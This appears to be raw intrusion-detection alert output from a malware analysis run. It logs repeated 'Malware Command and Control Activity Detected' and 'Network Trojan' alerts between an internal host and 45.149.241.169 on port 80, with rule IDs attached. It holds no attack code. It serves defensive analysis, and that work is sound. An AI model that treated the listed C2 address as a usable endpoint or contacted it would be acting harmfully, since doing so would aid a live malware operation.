                    2024-10-03T09:22:10.331436+020020253811Malware Command and Control Activity Detected192.168.2.116441245.149.241.16980TCP
                    2024-10-03T09:22:11.239806+020020253811Malware Command and Control Activity Detected192.168.2.116441345.149.241.16980TCP
                    2024-10-03T09:22:12.172123+020020253811Malware Command and Control Activity Detected192.168.2.116441445.149.241.16980TCP
                    2024-10-03T09:22:13.068985+020020253811Malware Command and Control Activity Detected192.168.2.116441545.149.241.16980TCP
                    2024-10-03T09:22:14.008975+020020253811Malware Command and Control Activity Detected192.168.2.116441645.149.241.16980TCP
                    2024-10-03T09:22:14.936067+020020253811Malware Command and Control Activity Detected192.168.2.116441745.149.241.16980TCP
                    2024-10-03T09:22:15.929179+020020253811Malware Command and Control Activity Detected192.168.2.116441845.149.241.16980TCP
                    2024-10-03T09:22:16.827330+020020253811Malware Command and Control Activity Detected192.168.2.116441945.149.241.16980TCP
                    2024-10-03T09:22:17.703674+020020253811Malware Command and Control Activity Detected192.168.2.116442045.149.241.16980TCP
                    2024-10-03T09:22:18.714301+020020253811Malware Command and Control Activity Detected192.168.2.116442145.149.241.16980TCP
                    2024-10-03T09:22:19.547744+020020253811Malware Command and Control Activity Detected192.168.2.116442245.149.241.16980TCP
                    2024-10-03T09:22:20.566222+020020253811Malware Command and Control Activity Detected192.168.2.116442345.149.241.16980TCP
                    2024-10-03T09:22:21.356699+020020253811Malware Command and Control Activity Detected192.168.2.116442445.149.241.16980TCP
                    2024-10-03T09:22:22.220181+020020253811Malware Command and Control Activity Detected192.168.2.116442545.149.241.16980TCP
                    2024-10-03T09:22:23.369318+020020253811Malware Command and Control Activity Detected192.168.2.116442645.149.241.16980TCP
                    2024-10-03T09:22:24.106031+020020253811Malware Command and Control Activity Detected192.168.2.116442745.149.241.16980TCP
                    2024-10-03T09:22:24.910667+020020253811Malware Command and Control Activity Detected192.168.2.116442845.149.241.16980TCP
                    2024-10-03T09:22:25.816016+020020253811Malware Command and Control Activity Detected192.168.2.116442945.149.241.16980TCP
                    2024-10-03T09:22:26.659850+020020253811Malware Command and Control Activity Detected192.168.2.116443045.149.241.16980TCP
                    2024-10-03T09:22:27.504132+020020253811Malware Command and Control Activity Detected192.168.2.116443145.149.241.16980TCP
                    2024-10-03T09:22:28.311778+020020253811Malware Command and Control Activity Detected192.168.2.116443245.149.241.16980TCP
                    2024-10-03T09:22:29.639445+020020253811Malware Command and Control Activity Detected192.168.2.116443345.149.241.16980TCP
                    2024-10-03T09:22:30.646052+020020253811Malware Command and Control Activity Detected192.168.2.116443445.149.241.16980TCP
                    2024-10-03T09:22:31.674682+020020253811Malware Command and Control Activity Detected192.168.2.116443545.149.241.16980TCP
                    2024-10-03T09:22:32.502916+020020253811Malware Command and Control Activity Detected192.168.2.116443645.149.241.16980TCP
                    2024-10-03T09:22:33.340490+020020253811Malware Command and Control Activity Detected192.168.2.116443745.149.241.16980TCP
                    2024-10-03T09:22:34.448158+020020253811Malware Command and Control Activity Detected192.168.2.116443845.149.241.16980TCP
                    2024-10-03T09:22:35.225001+020020253811Malware Command and Control Activity Detected192.168.2.116443945.149.241.16980TCP
                    2024-10-03T09:22:36.015476+020020253811Malware Command and Control Activity Detected192.168.2.116444045.149.241.16980TCP
                    2024-10-03T09:22:36.917140+020020253811Malware Command and Control Activity Detected192.168.2.116444145.149.241.16980TCP
                    2024-10-03T09:22:37.931400+020020253811Malware Command and Control Activity Detected192.168.2.116444245.149.241.16980TCP
                    2024-10-03T09:22:38.836712+020020253811Malware Command and Control Activity Detected192.168.2.116444345.149.241.16980TCP
                    2024-10-03T09:22:39.681925+020020253811Malware Command and Control Activity Detected192.168.2.116444445.149.241.16980TCP
                    2024-10-03T09:22:40.614660+020020253811Malware Command and Control Activity Detected192.168.2.116444545.149.241.16980TCP
                    2024-10-03T09:22:41.558183+020020253811Malware Command and Control Activity Detected192.168.2.116444645.149.241.16980TCP
                    2024-10-03T09:22:42.344416+020020253811Malware Command and Control Activity Detected192.168.2.116444745.149.241.16980TCP
                    2024-10-03T09:22:43.251789+020020253811Malware Command and Control Activity Detected192.168.2.116444845.149.241.16980TCP
                    2024-10-03T09:22:44.067474+020020253811Malware Command and Control Activity Detected192.168.2.116444945.149.241.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:20:32.181025+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164437TCP
                    2024-10-03T09:20:32.181025+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164368TCP
                    2024-10-03T09:20:32.181025+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164388TCP
                    2024-10-03T09:20:32.181025+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1149717TCP
                    2024-10-03T09:20:32.181025+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164348TCP
                    2024-10-03T09:20:32.181025+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164371TCP
                    2024-10-03T09:20:32.181025+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1149718TCP
                    2024-10-03T09:20:51.445072+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1149713TCP
                    2024-10-03T09:20:52.900738+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1149714TCP
                    2024-10-03T09:20:55.160370+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1149715TCP
                    2024-10-03T09:20:59.122929+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1155843TCP
                    2024-10-03T09:21:01.459279+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164350TCP
                    2024-10-03T09:21:02.297469+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164352TCP
                    2024-10-03T09:21:03.202516+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164354TCP
                    2024-10-03T09:21:04.268373+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164355TCP
                    2024-10-03T09:21:05.205632+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164357TCP
                    2024-10-03T09:21:06.216904+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164358TCP
                    2024-10-03T09:21:07.101687+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164359TCP
                    2024-10-03T09:21:08.062889+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164360TCP
                    2024-10-03T09:21:08.918941+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164361TCP
                    2024-10-03T09:21:09.844424+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164362TCP
                    2024-10-03T09:21:10.841978+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164363TCP
                    2024-10-03T09:21:11.926165+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164364TCP
                    2024-10-03T09:21:12.885827+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164365TCP
                    2024-10-03T09:21:13.771289+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164366TCP
                    2024-10-03T09:21:14.606299+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164367TCP
                    2024-10-03T09:21:16.922230+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164369TCP
                    2024-10-03T09:21:17.872168+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164370TCP
                    2024-10-03T09:21:21.433380+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164372TCP
                    2024-10-03T09:21:22.239708+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164373TCP
                    2024-10-03T09:21:23.095072+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164374TCP
                    2024-10-03T09:21:23.953248+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164375TCP
                    2024-10-03T09:21:24.880426+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164376TCP
                    2024-10-03T09:21:25.674220+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164378TCP
                    2024-10-03T09:21:26.693893+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164379TCP
                    2024-10-03T09:21:27.639571+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164380TCP
                    2024-10-03T09:21:28.553342+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164381TCP
                    2024-10-03T09:21:29.437160+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164382TCP
                    2024-10-03T09:21:30.264753+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164383TCP
                    2024-10-03T09:21:31.218885+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164384TCP
                    2024-10-03T09:21:32.603314+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164385TCP
                    2024-10-03T09:21:33.391128+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164386TCP
                    2024-10-03T09:21:35.071057+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164387TCP
                    2024-10-03T09:21:47.328778+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164389TCP
                    2024-10-03T09:21:48.285934+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164390TCP
                    2024-10-03T09:21:49.095497+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164391TCP
                    2024-10-03T09:21:50.342633+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164392TCP
                    2024-10-03T09:21:51.142841+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164393TCP
                    2024-10-03T09:21:51.992201+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164394TCP
                    2024-10-03T09:21:52.829891+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164395TCP
                    2024-10-03T09:21:53.827051+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164396TCP
                    2024-10-03T09:21:54.795139+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164397TCP
                    2024-10-03T09:21:55.749129+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164398TCP
                    2024-10-03T09:21:57.080376+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164399TCP
                    2024-10-03T09:21:58.015493+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164400TCP
                    2024-10-03T09:21:58.973834+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164401TCP
                    2024-10-03T09:21:59.929539+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164402TCP
                    2024-10-03T09:22:00.880849+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164403TCP
                    2024-10-03T09:22:02.998303+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164404TCP
                    2024-10-03T09:22:03.932185+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164405TCP
                    2024-10-03T09:22:04.926899+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164406TCP
                    2024-10-03T09:22:06.119391+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164407TCP
                    2024-10-03T09:22:07.070496+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164408TCP
                    2024-10-03T09:22:08.024007+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164409TCP
                    2024-10-03T09:22:09.073052+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164410TCP
                    2024-10-03T09:22:10.010284+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164411TCP
                    2024-10-03T09:22:11.084543+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164412TCP
                    2024-10-03T09:22:12.009694+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164413TCP
                    2024-10-03T09:22:12.898558+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164414TCP
                    2024-10-03T09:22:13.862095+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164415TCP
                    2024-10-03T09:22:14.782651+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164416TCP
                    2024-10-03T09:22:15.769373+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164417TCP
                    2024-10-03T09:22:16.672757+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164418TCP
                    2024-10-03T09:22:17.541317+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164419TCP
                    2024-10-03T09:22:18.559915+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164420TCP
                    2024-10-03T09:22:19.384819+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164421TCP
                    2024-10-03T09:22:20.373252+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164422TCP
                    2024-10-03T09:22:21.208335+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164423TCP
                    2024-10-03T09:22:22.053825+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164424TCP
                    2024-10-03T09:22:23.004091+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164425TCP
                    2024-10-03T09:22:23.936122+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164426TCP
                    2024-10-03T09:22:24.754606+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164427TCP
                    2024-10-03T09:22:25.644791+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164428TCP
                    2024-10-03T09:22:26.484271+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164429TCP
                    2024-10-03T09:22:27.336837+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164430TCP
                    2024-10-03T09:22:28.161528+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164431TCP
                    2024-10-03T09:22:29.297417+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164432TCP
                    2024-10-03T09:22:30.485332+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164433TCP
                    2024-10-03T09:22:31.491241+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164434TCP
                    2024-10-03T09:22:32.311823+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164435TCP
                    2024-10-03T09:22:33.193006+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164436TCP
                    2024-10-03T09:22:35.085142+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164438TCP
                    2024-10-03T09:22:35.853534+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164439TCP
                    2024-10-03T09:22:36.755143+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164440TCP
                    2024-10-03T09:22:37.782566+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164441TCP
                    2024-10-03T09:22:38.692949+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164442TCP
                    2024-10-03T09:22:39.530058+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164443TCP
                    2024-10-03T09:22:40.355345+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164444TCP
                    2024-10-03T09:22:41.357295+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164445TCP
                    2024-10-03T09:22:42.192690+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164446TCP
                    2024-10-03T09:22:43.095306+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164447TCP
                    2024-10-03T09:22:43.915998+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164448TCP
                    2024-10-03T09:22:44.845008+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1164449TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:20:51.444637+020020243131Malware Command and Control Activity Detected192.168.2.114971345.149.241.16980TCP
                    2024-10-03T09:20:52.895647+020020243131Malware Command and Control Activity Detected192.168.2.114971445.149.241.16980TCP
                    2024-10-03T09:20:55.154508+020020243131Malware Command and Control Activity Detected192.168.2.114971545.149.241.16980TCP
                    2024-10-03T09:20:56.378201+020020243131Malware Command and Control Activity Detected192.168.2.114971745.149.241.16980TCP
                    2024-10-03T09:20:57.546571+020020243131Malware Command and Control Activity Detected192.168.2.114971845.149.241.16980TCP
                    2024-10-03T09:20:59.117485+020020243131Malware Command and Control Activity Detected192.168.2.115584345.149.241.16980TCP
                    2024-10-03T09:21:00.355678+020020243131Malware Command and Control Activity Detected192.168.2.116434845.149.241.16980TCP
                    2024-10-03T09:21:01.453898+020020243131Malware Command and Control Activity Detected192.168.2.116435045.149.241.16980TCP
                    2024-10-03T09:21:02.292636+020020243131Malware Command and Control Activity Detected192.168.2.116435245.149.241.16980TCP
                    2024-10-03T09:21:03.191952+020020243131Malware Command and Control Activity Detected192.168.2.116435445.149.241.16980TCP
                    2024-10-03T09:21:04.262865+020020243131Malware Command and Control Activity Detected192.168.2.116435545.149.241.16980TCP
                    2024-10-03T09:21:05.200763+020020243131Malware Command and Control Activity Detected192.168.2.116435745.149.241.16980TCP
                    2024-10-03T09:21:06.209342+020020243131Malware Command and Control Activity Detected192.168.2.116435845.149.241.16980TCP
                    2024-10-03T09:21:07.095755+020020243131Malware Command and Control Activity Detected192.168.2.116435945.149.241.16980TCP
                    2024-10-03T09:21:08.058000+020020243131Malware Command and Control Activity Detected192.168.2.116436045.149.241.16980TCP
                    2024-10-03T09:21:08.908970+020020243131Malware Command and Control Activity Detected192.168.2.116436145.149.241.16980TCP
                    2024-10-03T09:21:09.839583+020020243131Malware Command and Control Activity Detected192.168.2.116436245.149.241.16980TCP
                    2024-10-03T09:21:10.836642+020020243131Malware Command and Control Activity Detected192.168.2.116436345.149.241.16980TCP
                    2024-10-03T09:21:11.918002+020020243131Malware Command and Control Activity Detected192.168.2.116436445.149.241.16980TCP
                    2024-10-03T09:21:12.880481+020020243131Malware Command and Control Activity Detected192.168.2.116436545.149.241.16980TCP
                    2024-10-03T09:21:13.766337+020020243131Malware Command and Control Activity Detected192.168.2.116436645.149.241.16980TCP
                    2024-10-03T09:21:14.575323+020020243131Malware Command and Control Activity Detected192.168.2.116436745.149.241.16980TCP
                    2024-10-03T09:21:15.899147+020020243131Malware Command and Control Activity Detected192.168.2.116436845.149.241.16980TCP
                    2024-10-03T09:21:16.915649+020020243131Malware Command and Control Activity Detected192.168.2.116436945.149.241.16980TCP
                    2024-10-03T09:21:17.866524+020020243131Malware Command and Control Activity Detected192.168.2.116437045.149.241.16980TCP
                    2024-10-03T09:21:19.008215+020020243131Malware Command and Control Activity Detected192.168.2.116437145.149.241.16980TCP
                    2024-10-03T09:21:21.428539+020020243131Malware Command and Control Activity Detected192.168.2.116437245.149.241.16980TCP
                    2024-10-03T09:21:22.234810+020020243131Malware Command and Control Activity Detected192.168.2.116437345.149.241.16980TCP
                    2024-10-03T09:21:23.090242+020020243131Malware Command and Control Activity Detected192.168.2.116437445.149.241.16980TCP
                    2024-10-03T09:21:23.948484+020020243131Malware Command and Control Activity Detected192.168.2.116437545.149.241.16980TCP
                    2024-10-03T09:21:24.875611+020020243131Malware Command and Control Activity Detected192.168.2.116437645.149.241.16980TCP
                    2024-10-03T09:21:25.669335+020020243131Malware Command and Control Activity Detected192.168.2.116437845.149.241.16980TCP
                    2024-10-03T09:21:26.688958+020020243131Malware Command and Control Activity Detected192.168.2.116437945.149.241.16980TCP
                    2024-10-03T09:21:27.634586+020020243131Malware Command and Control Activity Detected192.168.2.116438045.149.241.16980TCP
                    2024-10-03T09:21:28.548334+020020243131Malware Command and Control Activity Detected192.168.2.116438145.149.241.16980TCP
                    2024-10-03T09:21:29.432337+020020243131Malware Command and Control Activity Detected192.168.2.116438245.149.241.16980TCP
                    2024-10-03T09:21:30.259881+020020243131Malware Command and Control Activity Detected192.168.2.116438345.149.241.16980TCP
                    2024-10-03T09:21:31.213756+020020243131Malware Command and Control Activity Detected192.168.2.116438445.149.241.16980TCP
                    2024-10-03T09:21:32.591622+020020243131Malware Command and Control Activity Detected192.168.2.116438545.149.241.16980TCP
                    2024-10-03T09:21:33.386243+020020243131Malware Command and Control Activity Detected192.168.2.116438645.149.241.16980TCP
                    2024-10-03T09:21:35.070962+020020243131Malware Command and Control Activity Detected192.168.2.116438745.149.241.16980TCP
                    2024-10-03T09:21:46.491936+020020243131Malware Command and Control Activity Detected192.168.2.116438845.149.241.16980TCP
                    2024-10-03T09:21:47.323870+020020243131Malware Command and Control Activity Detected192.168.2.116438945.149.241.16980TCP
                    2024-10-03T09:21:48.281112+020020243131Malware Command and Control Activity Detected192.168.2.116439045.149.241.16980TCP
                    2024-10-03T09:21:49.089316+020020243131Malware Command and Control Activity Detected192.168.2.116439145.149.241.16980TCP
                    2024-10-03T09:21:50.342573+020020243131Malware Command and Control Activity Detected192.168.2.116439245.149.241.16980TCP
                    2024-10-03T09:21:51.138044+020020243131Malware Command and Control Activity Detected192.168.2.116439345.149.241.16980TCP
                    2024-10-03T09:21:51.987281+020020243131Malware Command and Control Activity Detected192.168.2.116439445.149.241.16980TCP
                    2024-10-03T09:21:52.824432+020020243131Malware Command and Control Activity Detected192.168.2.116439545.149.241.16980TCP
                    2024-10-03T09:21:53.813148+020020243131Malware Command and Control Activity Detected192.168.2.116439645.149.241.16980TCP
                    2024-10-03T09:21:54.779943+020020243131Malware Command and Control Activity Detected192.168.2.116439745.149.241.16980TCP
                    2024-10-03T09:21:55.743930+020020243131Malware Command and Control Activity Detected192.168.2.116439845.149.241.16980TCP
                    2024-10-03T09:21:57.049613+020020243131Malware Command and Control Activity Detected192.168.2.116439945.149.241.16980TCP
                    2024-10-03T09:21:58.009483+020020243131Malware Command and Control Activity Detected192.168.2.116440045.149.241.16980TCP
                    2024-10-03T09:21:58.968924+020020243131Malware Command and Control Activity Detected192.168.2.116440145.149.241.16980TCP
                    2024-10-03T09:21:59.912717+020020243131Malware Command and Control Activity Detected192.168.2.116440245.149.241.16980TCP
                    2024-10-03T09:22:00.875995+020020243131Malware Command and Control Activity Detected192.168.2.116440345.149.241.16980TCP
                    2024-10-03T09:22:02.986735+020020243131Malware Command and Control Activity Detected192.168.2.116440445.149.241.16980TCP
                    2024-10-03T09:22:03.927136+020020243131Malware Command and Control Activity Detected192.168.2.116440545.149.241.16980TCP
                    2024-10-03T09:22:04.921954+020020243131Malware Command and Control Activity Detected192.168.2.116440645.149.241.16980TCP
                    2024-10-03T09:22:06.114484+020020243131Malware Command and Control Activity Detected192.168.2.116440745.149.241.16980TCP
                    2024-10-03T09:22:07.060441+020020243131Malware Command and Control Activity Detected192.168.2.116440845.149.241.16980TCP
                    2024-10-03T09:22:07.996431+020020243131Malware Command and Control Activity Detected192.168.2.116440945.149.241.16980TCP
                    2024-10-03T09:22:09.068231+020020243131Malware Command and Control Activity Detected192.168.2.116441045.149.241.16980TCP
                    2024-10-03T09:22:10.004080+020020243131Malware Command and Control Activity Detected192.168.2.116441145.149.241.16980TCP
                    2024-10-03T09:22:11.079290+020020243131Malware Command and Control Activity Detected192.168.2.116441245.149.241.16980TCP
                    2024-10-03T09:22:12.003792+020020243131Malware Command and Control Activity Detected192.168.2.116441345.149.241.16980TCP
                    2024-10-03T09:22:12.893575+020020243131Malware Command and Control Activity Detected192.168.2.116441445.149.241.16980TCP
                    2024-10-03T09:22:13.853371+020020243131Malware Command and Control Activity Detected192.168.2.116441545.149.241.16980TCP
                    2024-10-03T09:22:14.776328+020020243131Malware Command and Control Activity Detected192.168.2.116441645.149.241.16980TCP
                    2024-10-03T09:22:15.764134+020020243131Malware Command and Control Activity Detected192.168.2.116441745.149.241.16980TCP
                    2024-10-03T09:22:16.667875+020020243131Malware Command and Control Activity Detected192.168.2.116441845.149.241.16980TCP
                    2024-10-03T09:22:17.525911+020020243131Malware Command and Control Activity Detected192.168.2.116441945.149.241.16980TCP
                    2024-10-03T09:22:18.555021+020020243131Malware Command and Control Activity Detected192.168.2.116442045.149.241.16980TCP
                    2024-10-03T09:22:19.379297+020020243131Malware Command and Control Activity Detected192.168.2.116442145.149.241.16980TCP
                    2024-10-03T09:22:20.358626+020020243131Malware Command and Control Activity Detected192.168.2.116442245.149.241.16980TCP
                    2024-10-03T09:22:21.203422+020020243131Malware Command and Control Activity Detected192.168.2.116442345.149.241.16980TCP
                    2024-10-03T09:22:22.048862+020020243131Malware Command and Control Activity Detected192.168.2.116442445.149.241.16980TCP
                    2024-10-03T09:22:22.910892+020020243131Malware Command and Control Activity Detected192.168.2.116442545.149.241.16980TCP
                    2024-10-03T09:22:23.931318+020020243131Malware Command and Control Activity Detected192.168.2.116442645.149.241.16980TCP
                    2024-10-03T09:22:24.748653+020020243131Malware Command and Control Activity Detected192.168.2.116442745.149.241.16980TCP
                    2024-10-03T09:22:25.639024+020020243131Malware Command and Control Activity Detected192.168.2.116442845.149.241.16980TCP
                    2024-10-03T09:22:26.473248+020020243131Malware Command and Control Activity Detected192.168.2.116442945.149.241.16980TCP
                    2024-10-03T09:22:27.331889+020020243131Malware Command and Control Activity Detected192.168.2.116443045.149.241.16980TCP
                    2024-10-03T09:22:28.156424+020020243131Malware Command and Control Activity Detected192.168.2.116443145.149.241.16980TCP
                    2024-10-03T09:22:29.195837+020020243131Malware Command and Control Activity Detected192.168.2.116443245.149.241.16980TCP
                    2024-10-03T09:22:30.480234+020020243131Malware Command and Control Activity Detected192.168.2.116443345.149.241.16980TCP
                    2024-10-03T09:22:31.486447+020020243131Malware Command and Control Activity Detected192.168.2.116443445.149.241.16980TCP
                    2024-10-03T09:22:32.303507+020020243131Malware Command and Control Activity Detected192.168.2.116443545.149.241.16980TCP
                    2024-10-03T09:22:33.188157+020020243131Malware Command and Control Activity Detected192.168.2.116443645.149.241.16980TCP
                    2024-10-03T09:22:34.292855+020020243131Malware Command and Control Activity Detected192.168.2.116443745.149.241.16980TCP
                    2024-10-03T09:22:35.079411+020020243131Malware Command and Control Activity Detected192.168.2.116443845.149.241.16980TCP
                    2024-10-03T09:22:35.848697+020020243131Malware Command and Control Activity Detected192.168.2.116443945.149.241.16980TCP
                    2024-10-03T09:22:36.750157+020020243131Malware Command and Control Activity Detected192.168.2.116444045.149.241.16980TCP
                    2024-10-03T09:22:37.777548+020020243131Malware Command and Control Activity Detected192.168.2.116444145.149.241.16980TCP
                    2024-10-03T09:22:38.687921+020020243131Malware Command and Control Activity Detected192.168.2.116444245.149.241.16980TCP
                    2024-10-03T09:22:39.523859+020020243131Malware Command and Control Activity Detected192.168.2.116444345.149.241.16980TCP
                    2024-10-03T09:22:40.350489+020020243131Malware Command and Control Activity Detected192.168.2.116444445.149.241.16980TCP
                    2024-10-03T09:22:41.352352+020020243131Malware Command and Control Activity Detected192.168.2.116444545.149.241.16980TCP
                    2024-10-03T09:22:42.187830+020020243131Malware Command and Control Activity Detected192.168.2.116444645.149.241.16980TCP
                    2024-10-03T09:22:43.088359+020020243131Malware Command and Control Activity Detected192.168.2.116444745.149.241.16980TCP
                    2024-10-03T09:22:43.911035+020020243131Malware Command and Control Activity Detected192.168.2.116444845.149.241.16980TCP
                    2024-10-03T09:22:44.840138+020020243131Malware Command and Control Activity Detected192.168.2.116444945.149.241.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:20:51.444637+020020243181Malware Command and Control Activity Detected192.168.2.114971345.149.241.16980TCP
                    2024-10-03T09:20:52.895647+020020243181Malware Command and Control Activity Detected192.168.2.114971445.149.241.16980TCP
                    2024-10-03T09:20:55.154508+020020243181Malware Command and Control Activity Detected192.168.2.114971545.149.241.16980TCP
                    2024-10-03T09:20:56.378201+020020243181Malware Command and Control Activity Detected192.168.2.114971745.149.241.16980TCP
                    2024-10-03T09:20:57.546571+020020243181Malware Command and Control Activity Detected192.168.2.114971845.149.241.16980TCP
                    2024-10-03T09:20:59.117485+020020243181Malware Command and Control Activity Detected192.168.2.115584345.149.241.16980TCP
                    2024-10-03T09:21:00.355678+020020243181Malware Command and Control Activity Detected192.168.2.116434845.149.241.16980TCP
                    2024-10-03T09:21:01.453898+020020243181Malware Command and Control Activity Detected192.168.2.116435045.149.241.16980TCP
                    2024-10-03T09:21:02.292636+020020243181Malware Command and Control Activity Detected192.168.2.116435245.149.241.16980TCP
                    2024-10-03T09:21:03.191952+020020243181Malware Command and Control Activity Detected192.168.2.116435445.149.241.16980TCP
                    2024-10-03T09:21:04.262865+020020243181Malware Command and Control Activity Detected192.168.2.116435545.149.241.16980TCP
                    2024-10-03T09:21:05.200763+020020243181Malware Command and Control Activity Detected192.168.2.116435745.149.241.16980TCP
                    2024-10-03T09:21:06.209342+020020243181Malware Command and Control Activity Detected192.168.2.116435845.149.241.16980TCP
                    2024-10-03T09:21:07.095755+020020243181Malware Command and Control Activity Detected192.168.2.116435945.149.241.16980TCP
                    2024-10-03T09:21:08.058000+020020243181Malware Command and Control Activity Detected192.168.2.116436045.149.241.16980TCP
                    2024-10-03T09:21:08.908970+020020243181Malware Command and Control Activity Detected192.168.2.116436145.149.241.16980TCP
                    2024-10-03T09:21:09.839583+020020243181Malware Command and Control Activity Detected192.168.2.116436245.149.241.16980TCP
                    2024-10-03T09:21:10.836642+020020243181Malware Command and Control Activity Detected192.168.2.116436345.149.241.16980TCP
                    2024-10-03T09:21:11.918002+020020243181Malware Command and Control Activity Detected192.168.2.116436445.149.241.16980TCP
                    2024-10-03T09:21:12.880481+020020243181Malware Command and Control Activity Detected192.168.2.116436545.149.241.16980TCP
                    2024-10-03T09:21:13.766337+020020243181Malware Command and Control Activity Detected192.168.2.116436645.149.241.16980TCP
                    2024-10-03T09:21:14.575323+020020243181Malware Command and Control Activity Detected192.168.2.116436745.149.241.16980TCP
                    2024-10-03T09:21:15.899147+020020243181Malware Command and Control Activity Detected192.168.2.116436845.149.241.16980TCP
                    2024-10-03T09:21:16.915649+020020243181Malware Command and Control Activity Detected192.168.2.116436945.149.241.16980TCP
                    2024-10-03T09:21:17.866524+020020243181Malware Command and Control Activity Detected192.168.2.116437045.149.241.16980TCP
                    2024-10-03T09:21:19.008215+020020243181Malware Command and Control Activity Detected192.168.2.116437145.149.241.16980TCP
                    2024-10-03T09:21:21.428539+020020243181Malware Command and Control Activity Detected192.168.2.116437245.149.241.16980TCP
